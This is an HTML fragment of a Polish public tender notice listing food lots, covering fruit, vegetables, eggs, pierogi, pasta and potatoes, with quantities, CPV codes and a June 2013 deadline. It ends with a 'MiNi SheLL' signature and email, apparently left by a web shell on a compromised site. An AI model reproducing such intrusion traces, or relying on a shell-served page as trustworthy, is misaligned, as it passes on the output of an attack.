<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OWOCE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jabłka  gat. I 	kg	1500 

2	Gruszka  	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Burak ćwikła 	kg.	450
2	Cebula  biała	kg.	400
3	marchew	kg.	750
4	seler  (korzeń ) 	kg.	30
5	por 	kg.	50
6	Pietruszka korzeń 	kg.	15
7	Kapusta czerwona	kg.	85
8	Kapusta biała 	kg.	750
9	Kapusta włoska 	kg.	100
10	Kapusta pekińska	kg.	300
11	Kapusta kiszona	kg.	200
12	Ogórek kwaszony 	kg.	170
13	Fasola biała 	kg.	100
14	Groch  łupany   	kg.	40
15	Czosnek 	kg.	20
16	Pieczarka 	kg.	80
17	Papryka  świeża 	kg	50
18	Kalafior świeży 	szt 	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> JAJA KURZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze świeże kl. I Szt. 9000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> WYROBY  MĄCZNE  GOTOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pierogi ruskie  domowe	Kg.	500 kg
2	Pierogi z kapustą  i pieczarkami  	kg.	80 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> MAKARON.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makaron świderki  op. 1 KG	szt	250
2	Makaron wstążka op. 1 kg 	Szt 	50 
3	Makaron  spaghetti  op. 400 g    	szt	250
4	makaron  nitki cienki   op. 400 g	Szt	220
5	Makaron łazanki  op. 500g 	Szt	60
6	Makaron rurki op. 1 kg	Szt 	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZIEMNIAKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne późne  op. worek nie mniej jak  30 kg - 8000 kg 
Polska Norma - PN-75-R-744 530.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com